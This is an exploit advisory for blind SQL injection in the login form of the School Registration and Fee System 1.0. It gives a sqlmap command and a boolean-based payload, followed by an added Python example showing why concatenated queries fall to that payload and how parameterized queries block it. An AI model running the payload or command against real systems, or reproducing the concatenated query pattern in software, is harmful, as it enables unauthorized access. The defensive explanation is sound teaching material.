## https://sploitus.com/exploit?id=PACKETSTORM:162052
# Exploit Title: School Registration and Fee System | 'username' Blind SQL Injection  
# Exploit Author: Richard Jones  
# Date: 01-04-2021  
# Vendor Homepage: https://www.sourcecodester.com/  
# Software Link: https://www.sourcecodester.com/php/10932/school-registration-and-fee-system.html  
# Version: 1.0  
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34  
  
Step 1 - Capture login request  
Step 2 - Run Command: sqlmap -r sql.txt --batch --risk 3 --level 3 -D bilal  
  
parameter: username (POST)  
Type: boolean-based blind  
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)  
Payload: username=admin' OR NOT 7365=7365-- enST&password=asd
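
Why the reported payload changes the login query, and the fix that stops it, as an added example that is not part of the original advisory or the application's code. It assumes the login query is built by string concatenation (the application's source is not shown here) and uses an in-memory SQLite table as a constructed stand-in for the MySQL data; the table, column and function names are hypothetical.

```python
import sqlite3

def make_db():
    # Constructed sample data; the schema is an assumption, and the password
    # is stored in plaintext only to keep the sample short.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'correct-horse')")
    return db

def login_concatenated(db, username, password):
    # Assumed vulnerable pattern: request values are spliced into the SQL text,
    # so a quote in `username` closes the literal and the rest is parsed as SQL.
    sql = ("SELECT username FROM users WHERE username='" + username +
           "' AND password='" + password + "'")
    return db.execute(sql).fetchall()

def login_parameterized(db, username, password):
    # Hardened form: placeholders keep both values as data, never as SQL.
    sql = "SELECT username FROM users WHERE username=? AND password=?"
    return db.execute(sql, (username, password)).fetchall()

# Values taken from the Payload line reported above.
PAYLOAD_USER = "admin' OR NOT 7365=7365-- enST"
PAYLOAD_PASS = "asd"

def compare():
    db = make_db()
    return {
        # The trailing "--" comments out the password check, so the row matches.
        "concatenated": login_concatenated(db, PAYLOAD_USER, PAYLOAD_PASS),
        # The whole string is compared as a username; no row matches.
        "parameterized": login_parameterized(db, PAYLOAD_USER, PAYLOAD_PASS),
        # A legitimate login still works with placeholders.
        "legit": login_parameterized(db, "admin", "correct-horse"),
    }

if __name__ == "__main__":
    for name, rows in compare().items():
        print(name, rows)
```

In the PHP application the equivalent fix is a prepared statement with bound parameters (PDO or mysqli) for both `username` and `password`.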